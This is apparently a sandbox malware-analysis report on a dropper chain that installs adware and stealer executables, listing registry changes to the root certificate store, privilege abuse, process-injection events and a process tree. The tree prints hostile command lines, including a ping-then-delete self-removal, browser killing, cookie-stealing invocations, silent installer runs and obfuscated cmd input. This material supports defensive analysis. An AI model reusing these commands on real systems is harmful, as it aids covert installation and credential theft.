Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	gpooe.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	Laniriradi.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall39.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Laniriradi.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
3680	PING.EXE
2352	PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 10 IoCs

pid	Process
3768	001.exe
112	installer.exe
2212	gpooe.exe
2976	google-game.exe
3200	huesaa.exe
3332	setup.exe
3496	askinstall39.exe
3756	Setup_v3.exe
908	005.exe
2308	SunLabsPlayer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1932	ultramediaburner.tmp
1932	ultramediaburner.tmp
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe
1432	Laniriradi.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3832	dw20.exe
1992	iexplore.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
3508	Fessura.exe.com

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1432	Laniriradi.exe
Token: SeRestorePrivilege	2476	msiexec.exe
Token: SeTakeOwnershipPrivilege	2476	msiexec.exe
Token: SeSecurityPrivilege	2476	msiexec.exe
Token: SeCreateTokenPrivilege	112	installer.exe
Token: SeAssignPrimaryTokenPrivilege	112	installer.exe
Token: SeLockMemoryPrivilege	112	installer.exe
Token: SeIncreaseQuotaPrivilege	112	installer.exe
Token: SeMachineAccountPrivilege	112	installer.exe
Token: SeTcbPrivilege	112	installer.exe
Token: SeSecurityPrivilege	112	installer.exe
Token: SeTakeOwnershipPrivilege	112	installer.exe
Token: SeLoadDriverPrivilege	112	installer.exe
Token: SeSystemProfilePrivilege	112	installer.exe
Token: SeSystemtimePrivilege	112	installer.exe
Token: SeProfSingleProcessPrivilege	112	installer.exe
Token: SeIncBasePriorityPrivilege	112	installer.exe
Token: SeCreatePagefilePrivilege	112	installer.exe
Token: SeCreatePermanentPrivilege	112	installer.exe
Token: SeBackupPrivilege	112	installer.exe
Token: SeRestorePrivilege	112	installer.exe
Token: SeShutdownPrivilege	112	installer.exe
Token: SeDebugPrivilege	112	installer.exe
Token: SeAuditPrivilege	112	installer.exe
Token: SeSystemEnvironmentPrivilege	112	installer.exe
Token: SeChangeNotifyPrivilege	112	installer.exe
Token: SeRemoteShutdownPrivilege	112	installer.exe
Token: SeUndockPrivilege	112	installer.exe
Token: SeSyncAgentPrivilege	112	installer.exe
Token: SeEnableDelegationPrivilege	112	installer.exe
Token: SeManageVolumePrivilege	112	installer.exe
Token: SeImpersonatePrivilege	112	installer.exe
Token: SeCreateGlobalPrivilege	112	installer.exe
Token: SeCreateTokenPrivilege	112	installer.exe
Token: SeAssignPrimaryTokenPrivilege	112	installer.exe
Token: SeLockMemoryPrivilege	112	installer.exe
Token: SeIncreaseQuotaPrivilege	112	installer.exe
Token: SeMachineAccountPrivilege	112	installer.exe
Token: SeTcbPrivilege	112	installer.exe
Token: SeSecurityPrivilege	112	installer.exe
Token: SeTakeOwnershipPrivilege	112	installer.exe
Token: SeLoadDriverPrivilege	112	installer.exe
Token: SeSystemProfilePrivilege	112	installer.exe
Token: SeSystemtimePrivilege	112	installer.exe
Token: SeProfSingleProcessPrivilege	112	installer.exe
Token: SeIncBasePriorityPrivilege	112	installer.exe
Token: SeCreatePagefilePrivilege	112	installer.exe
Token: SeCreatePermanentPrivilege	112	installer.exe
Token: SeBackupPrivilege	112	installer.exe
Token: SeRestorePrivilege	112	installer.exe
Token: SeShutdownPrivilege	112	installer.exe
Token: SeDebugPrivilege	112	installer.exe
Token: SeAuditPrivilege	112	installer.exe
Token: SeSystemEnvironmentPrivilege	112	installer.exe
Token: SeChangeNotifyPrivilege	112	installer.exe
Token: SeRemoteShutdownPrivilege	112	installer.exe
Token: SeUndockPrivilege	112	installer.exe
Token: SeSyncAgentPrivilege	112	installer.exe
Token: SeEnableDelegationPrivilege	112	installer.exe
Token: SeManageVolumePrivilege	112	installer.exe
Token: SeImpersonatePrivilege	112	installer.exe
Token: SeCreateGlobalPrivilege	112	installer.exe
Token: SeCreateTokenPrivilege	112	installer.exe
Token: SeAssignPrimaryTokenPrivilege	112	installer.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
1932	ultramediaburner.tmp
1992	iexplore.exe
112	installer.exe
1992	iexplore.exe

Suspicious use of SetWindowsHookEx 14 IoCs

pid	Process
1992	iexplore.exe
1992	iexplore.exe
1208	IEXPLORE.EXE
1208	IEXPLORE.EXE
1208	IEXPLORE.EXE
1208	IEXPLORE.EXE
2976	google-game.exe
2976	google-game.exe
1992	iexplore.exe
1992	iexplore.exe
8120	IEXPLORE.EXE
8120	IEXPLORE.EXE
8120	IEXPLORE.EXE
8120	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1628 wrote to memory of 2024	1628	Install.exe	26
PID 1628 wrote to memory of 2024	1628	Install.exe	26
PID 1628 wrote to memory of 2024	1628	Install.exe	26
PID 1628 wrote to memory of 2024	1628	Install.exe	26
PID 1628 wrote to memory of 2024	1628	Install.exe	26
PID 1628 wrote to memory of 2024	1628	Install.exe	26
PID 1628 wrote to memory of 2024	1628	Install.exe	26
PID 2024 wrote to memory of 1776	2024	Install.tmp	32
PID 2024 wrote to memory of 1776	2024	Install.tmp	32
PID 2024 wrote to memory of 1776	2024	Install.tmp	32
PID 2024 wrote to memory of 1776	2024	Install.tmp	32
PID 1776 wrote to memory of 1032	1776	Ultra.exe	33
PID 1776 wrote to memory of 1032	1776	Ultra.exe	33
PID 1776 wrote to memory of 1032	1776	Ultra.exe	33
PID 1776 wrote to memory of 1032	1776	Ultra.exe	33
PID 1776 wrote to memory of 1032	1776	Ultra.exe	33
PID 1776 wrote to memory of 1032	1776	Ultra.exe	33
PID 1776 wrote to memory of 1032	1776	Ultra.exe	33
PID 1032 wrote to memory of 1932	1032	ultramediaburner.exe	34
PID 1032 wrote to memory of 1932	1032	ultramediaburner.exe	34
PID 1032 wrote to memory of 1932	1032	ultramediaburner.exe	34
PID 1032 wrote to memory of 1932	1032	ultramediaburner.exe	34
PID 1032 wrote to memory of 1932	1032	ultramediaburner.exe	34
PID 1032 wrote to memory of 1932	1032	ultramediaburner.exe	34
PID 1032 wrote to memory of 1932	1032	ultramediaburner.exe	34
PID 1776 wrote to memory of 748	1776	Ultra.exe	35
PID 1776 wrote to memory of 748	1776	Ultra.exe	35
PID 1776 wrote to memory of 748	1776	Ultra.exe	35
PID 1776 wrote to memory of 1432	1776	Ultra.exe	36
PID 1776 wrote to memory of 1432	1776	Ultra.exe	36
PID 1776 wrote to memory of 1432	1776	Ultra.exe	36
PID 1932 wrote to memory of 564	1932	ultramediaburner.tmp	37
PID 1932 wrote to memory of 564	1932	ultramediaburner.tmp	37
PID 1932 wrote to memory of 564	1932	ultramediaburner.tmp	37
PID 1932 wrote to memory of 564	1932	ultramediaburner.tmp	37
PID 748 wrote to memory of 1992	748	ZHarenujezhi.exe	39
PID 748 wrote to memory of 1992	748	ZHarenujezhi.exe	39
PID 748 wrote to memory of 1992	748	ZHarenujezhi.exe	39
PID 1992 wrote to memory of 1208	1992	iexplore.exe	40
PID 1992 wrote to memory of 1208	1992	iexplore.exe	40
PID 1992 wrote to memory of 1208	1992	iexplore.exe	40
PID 1992 wrote to memory of 1208	1992	iexplore.exe	40
PID 1432 wrote to memory of 3352	1432	Laniriradi.exe	43
PID 1432 wrote to memory of 3352	1432	Laniriradi.exe	43
PID 1432 wrote to memory of 3352	1432	Laniriradi.exe	43
PID 3352 wrote to memory of 3600	3352	cmd.exe	45
PID 3352 wrote to memory of 3600	3352	cmd.exe	45
PID 3352 wrote to memory of 3600	3352	cmd.exe	45
PID 1432 wrote to memory of 3704	1432	Laniriradi.exe	46
PID 1432 wrote to memory of 3704	1432	Laniriradi.exe	46
PID 1432 wrote to memory of 3704	1432	Laniriradi.exe	46
PID 3704 wrote to memory of 3768	3704	cmd.exe	48
PID 3704 wrote to memory of 3768	3704	cmd.exe	48
PID 3704 wrote to memory of 3768	3704	cmd.exe	48
PID 3704 wrote to memory of 3768	3704	cmd.exe	48
PID 3600 wrote to memory of 3832	3600	KiffMainE1.exe	49
PID 3600 wrote to memory of 3832	3600	KiffMainE1.exe	49
PID 3600 wrote to memory of 3832	3600	KiffMainE1.exe	49
PID 1432 wrote to memory of 4056	1432	Laniriradi.exe	50
PID 1432 wrote to memory of 4056	1432	Laniriradi.exe	50
PID 1432 wrote to memory of 4056	1432	Laniriradi.exe	50
PID 4056 wrote to memory of 112	4056	cmd.exe	52
PID 4056 wrote to memory of 112	4056	cmd.exe	52
PID 4056 wrote to memory of 112	4056	cmd.exe	52

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1628
- C:\Users\Admin\AppData\Local\Temp\is-J3DRB.tmp\Install.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-J3DRB.tmp\Install.tmp" /SL5="$8015C,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2024
- - C:\Users\Admin\AppData\Local\Temp\is-D27HT.tmp\Ultra.exe
    "C:\Users\Admin\AppData\Local\Temp\is-D27HT.tmp\Ultra.exe" /S /UID=burnerch1
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:1776
  - - C:\Program Files\Internet Explorer\EGNXVROZLN\ultramediaburner.exe
      "C:\Program Files\Internet Explorer\EGNXVROZLN\ultramediaburner.exe" /VERYSILENT
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1032
    - - C:\Users\Admin\AppData\Local\Temp\is-BNLSA.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-BNLSA.tmp\ultramediaburner.tmp" /SL5="$6012E,281924,62464,C:\Program Files\Internet Explorer\EGNXVROZLN\ultramediaburner.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:1932
      - C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        6⤵
        Executes dropped EXE
        
        PID:564
  - - C:\Users\Admin\AppData\Local\Temp\70-7325e-3e7-f18ae-d292acb505619\ZHarenujezhi.exe
      "C:\Users\Admin\AppData\Local\Temp\70-7325e-3e7-f18ae-d292acb505619\ZHarenujezhi.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:748
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
        5⤵
        Modifies Internet Explorer settings
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1992
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1992 CREDAT:275457 /prefetch:2
        6⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1208
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1992 CREDAT:668680 /prefetch:2
        6⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:8120
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
        5⤵
        
        PID:8160
  - - C:\Users\Admin\AppData\Local\Temp\87-a6bc8-287-95fb6-2db5e085cccd8\Laniriradi.exe
      "C:\Users\Admin\AppData\Local\Temp\87-a6bc8-287-95fb6-2db5e085cccd8\Laniriradi.exe"
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1432
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ddqhuhi.3n1\KiffMainE1.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3352
      - C:\Users\Admin\AppData\Local\Temp\5ddqhuhi.3n1\KiffMainE1.exe
        
        C:\Users\Admin\AppData\Local\Temp\5ddqhuhi.3n1\KiffMainE1.exe
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3600
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 528
        7⤵
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:3832
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1kgvvwwh.jbw\001.exe & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3704
      - C:\Users\Admin\AppData\Local\Temp\1kgvvwwh.jbw\001.exe
        
        C:\Users\Admin\AppData\Local\Temp\1kgvvwwh.jbw\001.exe
        6⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3768
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hirzhqel.pgt\installer.exe /qn CAMPAIGN="654" & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4056
      - C:\Users\Admin\AppData\Local\Temp\hirzhqel.pgt\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\hirzhqel.pgt\installer.exe /qn CAMPAIGN="654"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Modifies system certificate store
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:112
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\hirzhqel.pgt\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\hirzhqel.pgt\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619983796 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        7⤵
        
        PID:4068
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lrctvabx.hbn\gpooe.exe & exit
        5⤵
        
        PID:2120
      - C:\Users\Admin\AppData\Local\Temp\lrctvabx.hbn\gpooe.exe
        
        C:\Users\Admin\AppData\Local\Temp\lrctvabx.hbn\gpooe.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Modifies system certificate store
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:2212
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:2300
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:3100
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:7876
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:7612
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ugu3tzxd.3z0\google-game.exe & exit
        5⤵
        
        PID:2880
      - C:\Users\Admin\AppData\Local\Temp\ugu3tzxd.3z0\google-game.exe
        
        C:\Users\Admin\AppData\Local\Temp\ugu3tzxd.3z0\google-game.exe
        6⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        Suspicious use of SetWindowsHookEx
        
        PID:2976
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
        7⤵
        
        PID:3032
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\owebemxl.dvf\huesaa.exe & exit
        5⤵
        
        PID:3140
      - C:\Users\Admin\AppData\Local\Temp\owebemxl.dvf\huesaa.exe
        
        C:\Users\Admin\AppData\Local\Temp\owebemxl.dvf\huesaa.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3200
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:3292
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:2452
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:8068
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        Executes dropped EXE
        
        PID:2384
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yxsrtcvt.hn0\setup.exe & exit
        5⤵
        
        PID:3276
      - C:\Users\Admin\AppData\Local\Temp\yxsrtcvt.hn0\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\yxsrtcvt.hn0\setup.exe
        6⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3332
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\yxsrtcvt.hn0\setup.exe"
        7⤵
        
        PID:3644
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        8⤵
        Runs ping.exe
        
        PID:3680
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z5lfv4do.ztm\askinstall39.exe & exit
        5⤵
        
        PID:3416
      - C:\Users\Admin\AppData\Local\Temp\z5lfv4do.ztm\askinstall39.exe
        
        C:\Users\Admin\AppData\Local\Temp\z5lfv4do.ztm\askinstall39.exe
        6⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3496
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        7⤵
        
        PID:2624
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        8⤵
        Kills process with taskkill
        
        PID:2672
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\od2qohqk.lzt\Setup_v3.exe & exit
        5⤵
        
        PID:3696
      - C:\Users\Admin\AppData\Local\Temp\od2qohqk.lzt\Setup_v3.exe
        
        C:\Users\Admin\AppData\Local\Temp\od2qohqk.lzt\Setup_v3.exe
        6⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3756
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        7⤵
        
        PID:3872
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c cfJhtziJSwbWaavQqftKBOzknThtiEQiDkdMlfkCNBTYvSLeKmkYzx & C:\Windows\System32\cmd.exe < Sta.vstm
        7⤵
        
        PID:4032
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        8⤵
        Loads dropped DLL
        
        PID:2064
        
        C:\Windows\SysWOW64\findstr.exe
        
